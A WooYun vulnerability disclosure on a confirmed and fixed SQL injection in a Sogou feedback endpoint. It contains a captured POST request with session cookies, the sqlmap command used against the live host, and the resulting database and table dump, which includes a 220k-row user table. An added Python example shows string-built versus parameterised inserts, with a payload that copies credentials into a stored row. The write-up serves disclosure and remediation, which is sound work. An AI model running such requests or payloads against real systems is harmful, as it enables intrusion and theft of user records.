Vulnerability summary

Defect ID: wooyun-2016-0208814

Title: SQL injection in a Sogou endpoint exposes 220k user records

Vendor: Sogou

Author: 黑色键盘丶

Submitted: 2016-05-15 10:24

Fixed: 2016-06-30 08:20

Published: 2016-06-30 08:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-05-15: Details sent to the vendor, awaiting vendor action
2016-05-16: Vendor confirmed; details visible to the vendor only
2016-05-26: Details opened to core white hats and domain experts
2016-06-05: Details opened to regular white hats
2016-06-15: Details opened to intern white hats
2016-06-30: Details opened to the public

Brief description:

As titled.

Detailed description:

Captured the requests behind http://fankui.help.sogou.com/index.php/web/web/index?type=6. Appending a single quote to a parameter of the addShenSu POST makes the backend return a database error, so the input reaches the SQL parser unescaped. Hard to guard against everything.


[screenshot: 111.png]


sqlmap invocation: sqlmap.py -r 1.txt --dbs (1.txt holds the raw request below)
---------------- request ----------------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; ld=Hkllllllll2g2sZqlllllVtL@xUlllllT66QhZllll9lllllRklll5@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260
Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=


Database information
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test


Tables in the current database
Database: sogou_zhanzhang
+-------------------------------+----------+
| Table                         |  Entries |
+-------------------------------+----------+
| deadlink_wap_data             | 15191050 |
| url_submit                    |   547950 |
| url_submit_view               |   547950 |
| website                       |   270697 |
| website_view                  |   270697 |
| `user`                        |   220754 |
| sitemap                       |   175918 |
| sitemap_copy                  |   175417 |
| sitemap_view                  |   168249 |
| site_name                     |    73232 |
| website_precision             |    67856 |
| site_name_view                |    65060 |
| fault_block_log               |    54773 |
| sitemap_wap                   |    52806 |
| fault_block                   |    51056 |
| sitemap_wap_view              |    48773 |
| sitemap_invitation            |    45320 |
| sitemap_invitation_view       |    43771 |
| site_icon                     |    42416 |
| site_icon_view                |    42067 |
| spider_pressure_feedback      |    31070 |
| sitemap_invitation_log        |    28583 |
| site_logo                     |    27750 |
| site_logo_view                |    25608 |
| site_name_log                 |    24155 |
| spider_pressure_feedback_view |    23755 |
| web2wap                       |    20046 |
| web2wap_view                  |    19268 |
| site_logo_log                 |    17607 |
| renzheng_log                  |    16555 |
| supply_fetch                  |    14501 |
| site_icon_log                 |    13925 |
| renzheng                      |     9324 |
| fb_updateshensu               |     5427 |
| fb_shensu                     |     5341 |
| web2wap_log                   |     4917 |
| fb_img                        |     3720 |
| redirection                   |     3696 |
| redirection_view              |     3696 |
| tb_member                     |     3682 |
| feedback                      |     3270 |
| fb_tool                       |     2906 |
| feedback_view                 |     2773 |
| url_shoulu                    |     2577 |
| umis_waitingfavicon_log       |     2568 |
| umis_waitingfavicon           |     2520 |
| site_param                    |     1992 |
| sitemap_blacklist             |     1917 |
| site_param_view               |     1825 |
| website_precision_log         |     1064 |
| user_change_log               |      968 |
| redirection_log               |      561 |
| fb_suggestion                 |      289 |
| fb_jubao                      |      201 |
| fb_record                     |      153 |
| renzheng_set                  |      106 |
| fb_kuaizhao                   |       81 |
| mail_view                     |       78 |
| backend_user                  |       74 |
| website_log                   |       63 |
| product_black_list            |       24 |
| user_invitation               |       19 |
| notice                        |       18 |
| fb_updatetool                 |       14 |
| website_precision_maxid       |        7 |
| columnist                     |        5 |
| partner_white_list            |        5 |
| mail_group                    |        1 |
| site_param_log                |        1 |
+-------------------------------+----------+

Proof of vulnerability:

Same capture, sqlmap command, database list and table listing as in the detailed description above.

Fix:

Validate and escape the Shensu[*] parameters of the addShenSu handler, or better, bind them through prepared statements so user input never reaches the SQL parser.
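To make the fix concrete, here is an added example that is not code from the report or from Sogou: a string-built INSERT of the kind behind this bug next to the same insert done with a bound-parameter statement. SQLite in memory stands in for the real database, which the page does not identify; the `fb_shensu` and `user` tables are stand-ins named after entries in the table listing above, and their columns and the `admin` row are assumptions. The example shows the single-quote error the report describes, a payload that copies a row from `user` into the stored feedback record through the vulnerable path, and the fixed path storing both inputs as plain text.

```python
import sqlite3


def setup_db():
    """Constructed stand-in schema; column names and the sample user are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE fb_shensu (id INTEGER PRIMARY KEY, web_adr TEXT, reason TEXT, contact TEXT);
        CREATE TABLE "user" (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO "user" (username, password) VALUES ('admin', 'hash_placeholder');
    """)
    return conn


def add_shensu_vulnerable(conn, web_adr, reason, contact):
    """Vulnerable: request values are spliced into the SQL text (the bug pattern)."""
    sql = ("INSERT INTO fb_shensu (web_adr, reason, contact) "
           f"VALUES ('{web_adr}', '{reason}', '{contact}')")
    conn.execute(sql)
    conn.commit()


def add_shensu_fixed(conn, web_adr, reason, contact):
    """Fixed: values are bound as parameters and never parsed as SQL."""
    conn.execute(
        "INSERT INTO fb_shensu (web_adr, reason, contact) VALUES (?, ?, ?)",
        (web_adr, reason, contact),
    )
    conn.commit()


def contacts(conn):
    """Stored contact values in insertion order."""
    return [row[0] for row in conn.execute("SELECT contact FROM fb_shensu ORDER BY id")]


def demo():
    """Run the three scenarios and return what each produced."""
    results = {}
    conn = setup_db()

    # 1. The single-quote probe from the report: the vulnerable path errors out
    #    because the quote unbalances the string literal in the INSERT.
    try:
        add_shensu_vulnerable(conn, "http://www.sogou.com/", "1", "[email protected]'")
        results["quote_error"] = False
    except sqlite3.OperationalError:
        results["quote_error"] = True

    # 2. Closing the literal and concatenating a subquery pulls data from
    #    another table into the row being stored (attacker can later read it back).
    payload = "x'||(SELECT username||':'||password FROM \"user\" LIMIT 1)||'"
    add_shensu_vulnerable(conn, "http://www.sogou.com/", "1", payload)
    results["exfil_row"] = contacts(conn)[-1]

    # 3. The same two inputs through the fixed function are stored verbatim.
    add_shensu_fixed(conn, "http://www.sogou.com/", "1", "[email protected]'")
    add_shensu_fixed(conn, "http://www.sogou.com/", "1", payload)
    results["fixed_rows"] = contacts(conn)[-2:]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The concatenation operator and subquery syntax differ between databases, but the mechanism is the same: once a quote closes the literal, whatever follows is SQL, and no amount of filtering keeps up with every encoding of that quote. Binding parameters removes the problem instead of chasing it.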

Copyright notice: when reposting, credit the source as 黑色键盘丶@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-05-16 08:12

Vendor reply:

Thanks for your support.

Latest status:

None yet.

